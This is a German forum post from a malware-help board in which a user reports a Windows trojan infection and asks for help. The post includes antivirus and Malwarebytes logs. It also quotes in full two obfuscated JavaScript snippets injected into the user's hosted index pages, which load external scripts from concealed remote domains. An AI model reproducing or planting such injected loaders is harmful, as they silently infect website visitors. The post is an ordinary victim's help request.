| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Trojaner-ProblemWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
22.01.2010, 14:01
| #1 |
| |  Trojaner-Problem Hallo... Habe ein (Trojaner-)Problem - die Logs poste ich dann im Anschluß... Das Problem äußert sich durch langsames System, stehenbleibenden Bildschirmschoner, und ich denke, es hat auch damit zu tun: Ich betreibe 2 Homepages, und seit einiger Zeit taucht - wie auch immer - in der ONLINE-Version meiner index.htm seiten regelmäßig scripts auf (nur in der online-version, die index.htm dateen auf meiner festplatte bleiben unverändert ! da die eine homepage bei arcor, die andere bei host4free gehostet ist, kommt mir das seltsam vor... das eine script: <script>/*Exception*/ document.write('<script src='+'h!t#&$(t@!p!&:!(/!!/@#&l#(i)@n@^@k^&$@s^^#y((#&n#e$)r&&g^#y()-$&&c)!)o!&#m$.#m)$$s^n@!.)&c^!!o@#m(&.(c!$n()(.(#&f#&@!l#!$!i&))n##g&&&)(-$(c^$o@m&!.&$s&@u(^$)p$e&##r$#t&!&r$^$@u(!)e)#l)#!i!!!)#f^$&e$!^.()$!r#!(u@&(@  &8@$0!$8^#0((/^)a&s)$(s)o#)c#!i$a(&)t#$e#(^&d@@$#c#!o@^n!@^!t#e)#&n$&t(()$!.$&^)c^(o)(#!(m#/$@^a^)(s!@()s)$)@o@@)!c^!&i$a@$t$e!!&d)$c$#o@#@n$(!t#$))e()$(n(!t!(^!.#@$c&&#!o)!@m^!^)@/)@)g)!o)!o(&^g@(l$@^&e((@.(#c$o)@(m&/@#s^))@e$&##n$#^^d@&@s)&@&p#a(c#e^.!&@c@^o$^^m(^!/!h^^a(r$&d^(s@^e$)x!$&t#(u^b!!@e@$^.)(c)o!^m$)@/#&)!'.replace(/@|#|\)|&|\(|\!|\^|\$/ig, '')+' defer=defer></scr'+'ipt>');</script><!--bb351a29f71f86436284012bdc843c51--> das andere: <script>/*Exception*/ document.write('<script src='+'h!#^t)t^(()p&@:#(/@^/&^&o)d@)^e&^s(^((#k$$^)-&$@)c^)!@o!m@(^.(^@m$#a@&c((y$#$s($.)!c@#@!o@@))m^&.(#$z$@i$#&#d^&d!u&#(&-$&c&)(o^)m$(^#.&#$g!()e&n!^!u)$)i$&#n&#&e)(@c#@!$o)#@l$o!#r&&s)$.^!)@(r@u(&@:!)!8))&0^#8^0^!@/##a(&$c!!)#$e(r@@@.)(@c$#$o^@!m)$(/^a@(c^&&&!e(^#r))#.&&$c&)$^o#^m#/)##y#(&o(@$u&^(d@a#o!^^!.^c!$$!o&)^&$m@$/$@i!^$@c)i#&$(c(($i@(b$a()n$(k$)^.$$$)c@^&o(@@m()/)!g&)#o^$@o#^#g#l&!e@$.!^c)(@o$^m^#/$)'.replace(/\)|&|#|@|\!|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script> <!--6594db7b72523c30fbba924501816e7f--> Als Windows Defender mir ne Warnung brachte, hab ich AntiVir installiert. Ergebnis: 10.1.2010: AntiVir-Meldung: In der Datei 'C:\Windows\System32\efsuavaw.dll' wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Ursnif.34816I.1' [trojan] gefunden. AntiVir konnte nicht löschen, also hab ich das Teil umbenannt und dann, wie ich meinte, entfernt durch löschen mit BVWipe. Dann am 16.1.2010 von AntiVir: In der Datei 'C:\~BCWipe.stu\Windows_System32_efsuavaw.VIR' wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Ursnif.34816I.1' [trojan] gefunden. Wieder vermeintlich entfernt, dann am 22.1.: AntiVir meldet: In der Datei 'C:\Program Files\Mozilla Firefox\fjhdyfhsn.bat' wurde ein Virus oder unerwünschtes Programm 'BAT/Agent.143' [virus] gefunden. Ausgeführte Aktion: Datei löschen In der Datei 'C:\Users\PC012007\AppData\Local\Temp\~TME914.tmp' wurde ein Virus oder unerwünschtes Programm 'TR/Crypt.ZPACK.Gen' [trojan] gefunden. Ausgeführte Aktion: Datei löschen In der Datei 'C:\Users\PC012007\AppData\Local\Temp\~TME914.tmp' wurde ein Virus oder unerwünschtes Programm 'TR/Crypt.ZPACK.Gen' [trojan] gefunden. Ausgeführte Aktion: Datei löschen In der Datei 'C:\Windows\System32\efsuavaw.dll' wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden. Ausgeführte Aktion: Datei umbenennen In der Datei 'C:\Windows\System32\efsuavaw.dll' wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden. Ausgeführte Aktion: Datei löschen In der Datei 'C:\Windows\System32\efsuavaw.dll' wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden. Ausgeführte Aktion: Zugriff verweigern Habe jetzt die hier empfohlenen 3 Programme ausgeführt, hier das log von anti-malware: Malwarebytes' Anti-Malware 1.44 Datenbank Version: 3614 Windows 6.0.6000 Internet Explorer 7.0.6000.16386 22.01.2010 13:25:33 mbam-log-2010-01-22 (13-25-09).txt Scan-Methode: Quick-Scan Durchsuchte Objekte: 95781 Laufzeit: 43 minute(s), 47 second(s) Infizierte Speicherprozesse: 0 Infizierte Speichermodule: 0 Infizierte Registrierungsschlüssel: 0 Infizierte Registrierungswerte: 1 Infizierte Dateiobjekte der Registrierung: 0 Infizierte Verzeichnisse: 0 Infizierte Dateien: 2 Infizierte Speicherprozesse: (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: (Keine bösartigen Objekte gefunden) Infizierte Registrierungswerte: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysgif32 (Trojan.Agent) -> No action taken. Infizierte Dateiobjekte der Registrierung: (Keine bösartigen Objekte gefunden) Infizierte Verzeichnisse: (Keine bösartigen Objekte gefunden) Infizierte Dateien: C:\Users\PC012007\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken. C:\Users\PC012007\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken. Habe alle drei dann in der Quarantäneliste gelöscht. Poste in einem 2. Post dann das log von RSIT... Bin ich die Dinger nun los, oder was kann ich weiter tun??? Danke schonmal... |
| Themen zu Trojaner-Problem |
| antivir, bildschirmschoner, datei, dateien, defender, ergebnis, explorer, firefox, folge, local\temp, löschen, malware.trace, microsoft, mozilla, problem, programm, programme, registrierungsschlüssel, seite, seiten, software, system, system32, temp, trojan.agent, trojaner agent, virus, warnung, windows |
Baum-Darstellung